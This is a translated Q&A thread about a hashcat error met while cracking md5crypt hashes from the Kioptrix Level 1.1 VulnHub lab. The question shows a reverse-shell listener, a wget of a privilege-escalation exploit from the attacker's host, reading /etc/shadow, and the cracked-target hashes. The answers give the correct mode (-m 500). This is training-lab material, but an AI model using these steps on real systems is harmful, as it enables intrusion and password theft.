hashcat:没有加载散列

Question

我一直在尝试Kioptrix: Level 1.1 (#2)并设法获得根访问权限。https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

wolf@linux:~$ nc -vklp 8080
listening on [any] 8080 ...
10.10.10.10: inverse host lookup failed: Unknown host
connect to [10.10.10.99] from (UNKNOWN) [10.10.10.10] 32795

id
uid=48(apache) gid=48(apache) groups=48(apache)

cd /tmp
wget http://10.10.10.99/privesc.c
ls
privesc.c
gcc privesc.c -o privesc
./privesc

id
uid=0(root) gid=0(root) groups=48(apache)

cat /etc/passwd
cat /etc/shadow

取消阴影文件= md5.txt

wolf@linux:~$ cat md5.txt 
root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash
wolf@linux:~$ 

但是，我在将取消阴影文件md5.txt发送到hashcat时遇到了问题。

知道这是怎么回事吗？

wolf@linux:~$ hashcat -m 0 -a 0 md5.txt rockyou.txt
hashcat (v4.0.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================

Hashfile 'md5.txt' on line 1 (root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash): Line-length exception
Hashfile 'md5.txt' on line 2 (john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash): Line-length exception
Hashfile 'md5.txt' on line 3 (harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash): Line-length exception
Parsing Hashes: 0/3 (0.00%)...No hashes loaded.

Started: Mon May 25 01:17:21 2020
Stopped: Mon May 25 01:17:21 2020
wolf@linux:~$ 

<#>更新

我也尝试过只使用md5散列，而不是取消阴影文件，但仍然没有工作。

仅md5散列

wolf@linux:~$ cat md5only.txt 
$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.
$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1
$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1
wolf@linux:~$ 

仍然得到相同的Line-length exception，(0.00%)...No hashes loaded错误。

wolf@linux:~$ hashcat -m 0 -a 0 md5only.txt rockyou.txt
hashcat (v4.0.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================

Hashfile 'md5only.txt' on line 1 ($1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.): Line-length exception
Hashfile 'md5only.txt' on line 2 ($1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1): Line-length exception
Hashfile 'md5only.txt' on line 3 ($1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1): Line-length exception
Parsing Hashes: 0/3 (0.00%)...No hashes loaded.

Started: Mon May 25 03:10:03 2020
Stopped: Mon May 25 03:10:03 2020
wolf@linux:~$ 

Answer 1

你的哈希猫是什么版本的？

kali@kali:$ hashcat --version
v5.1.0
kali@kali:$ 

哈希猫支持的md5有几种类型

kali@kali:$ hashcat -h | grep md5
     10 | md5($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
     20 | md5($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
     30 | md5(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
     40 | md5($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
   3800 | md5($salt.$pass.$salt)                           | Raw Hash, Salted and/or Iterated
   3710 | md5($salt.md5($pass))                            | Raw Hash, Salted and/or Iterated
   4010 | md5($salt.md5($salt.$pass))                      | Raw Hash, Salted and/or Iterated
   4110 | md5($salt.md5($pass.$salt))                      | Raw Hash, Salted and/or Iterated
   2600 | md5(md5($pass))                                  | Raw Hash, Salted and/or Iterated
   3910 | md5(md5($pass).md5($salt))                       | Raw Hash, Salted and/or Iterated
   4300 | md5(strtoupper(md5($pass)))                      | Raw Hash, Salted and/or Iterated
   4400 | md5(sha1($pass))                                 | Raw Hash, Salted and/or Iterated
   4700 | sha1(md5($pass))                                 | Raw Hash, Salted and/or Iterated
   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)            | HTTP, SMTP, LDAP Server
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)        | Operating Systems
   6300 | AIX {smd5}                                       | Operating Systems
kali@kali:$ 

如果您使用hashid检查哈希，您会发现这实际上是MD5 Crypt

kali@kali:$ hashid '$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.'
Analyzing '$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.'
[+] MD5 Crypt 
[+] Cisco-IOS(MD5) 
[+] FreeBSD MD5 
kali@kali:$ 

只有一个md5crypt，代码是500。

kali@kali:$ hashcat -h | grep md5.*cry
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)        | Operating Systems
kali@kali:$ 

用正确的哈希模式再试一次，这是本例中的500。

再试一次。瓦利亚

kali@kali:~$ hashcat -m 500 -a 0 md5crypt.txt rockyou.txt
hashcat (v4.0.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================

Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte

Password length minimum: 0
Password length maximum: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger disabled.

* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=32 -D CUDA_ARCH=601 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=500 -D _unroll'
* Device #1: Kernel m00500.c2bb92e8.kernel not found in cache! Building may take a while...


* Device #1: Kernel amp_a0.e98c1de0.kernel not found in cache! Building may take a while...


Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

- Device #1: autotuned kernel-accel to 128                
- Device #1: autotuned kernel-loops to 250

Answer 2

与开膛手约翰不同，Hashcat不理解密码文件格式；它只需要散列。因此，例如，要破解root密码，只需向Hashcat提供以下内容：$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.

编辑：我忽略了您使用的选项。这些不是普通的MD5散列；常规散列只能是十六进制字符。在运行Hashcat之前，将哈希与他们的桌子匹配以确定正确的类型。在本例中，它们看起来像md5crypt，所以正确的选项是-m 500。